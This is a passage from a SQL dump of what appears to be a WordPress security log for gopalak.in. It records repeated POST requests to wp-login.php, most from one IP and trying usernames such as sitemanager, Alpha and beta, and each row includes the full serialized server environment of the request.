03:41:30'),(94683,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53180\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050048.1392779;s:12:\"REQUEST_TIME\";i:1746050048;}}','196.251.112.104',1,'2025-05-01 03:24:09','2025-05-02 03:41:30'),(94684,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53665\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050239.3631489;s:12:\"REQUEST_TIME\";i:1746050239;}}','196.251.112.104',1,'2025-05-01 03:27:21','2025-05-02 03:41:30'),(94685,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53670\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050239.3889959;s:12:\"REQUEST_TIME\";i:1746050239;}}','196.251.112.104',1,'2025-05-01 03:27:21','2025-05-02 03:41:30'),(94686,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53672\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050239.4351201;s:12:\"REQUEST_TIME\";i:1746050239;}}','196.251.112.104',1,'2025-05-01 03:27:21','2025-05-02 03:41:30'),(94687,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53673\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050239.4364901;s:12:\"REQUEST_TIME\";i:1746050239;}}','196.251.112.104',1,'2025-05-01 03:27:21','2025-05-02 03:41:30'),(94688,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53675\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050239.432307;s:12:\"REQUEST_TIME\";i:1746050239;}}','196.251.112.104',1,'2025-05-01 03:27:21','2025-05-02 03:41:30'),(94689,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36854\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050281.767704;s:12:\"REQUEST_TIME\";i:1746050281;}}','23.239.27.53',0,'2025-05-01 03:28:03','1970-01-01 00:00:00'),(94690,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54132\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050403.469847;s:12:\"REQUEST_TIME\";i:1746050403;}}','196.251.112.104',1,'2025-05-01 03:30:05','2025-05-02 03:41:30'),(94691,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54133\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050403.46645;s:12:\"REQUEST_TIME\";i:1746050403;}}','196.251.112.104',1,'2025-05-01 03:30:05','2025-05-02 03:41:30'),(94692,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54131\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050403.435329;s:12:\"REQUEST_TIME\";i:1746050403;}}','196.251.112.104',1,'2025-05-01 03:30:05','2025-05-02 03:41:30'),(94693,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54134\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050403.5037069;s:12:\"REQUEST_TIME\";i:1746050403;}}','196.251.112.104',1,'2025-05-01 03:30:05','2025-05-02 03:41:30'),(94694,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54129\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050403.4073541;s:12:\"REQUEST_TIME\";i:1746050403;}}','196.251.112.104',1,'2025-05-01 03:30:05','2025-05-02 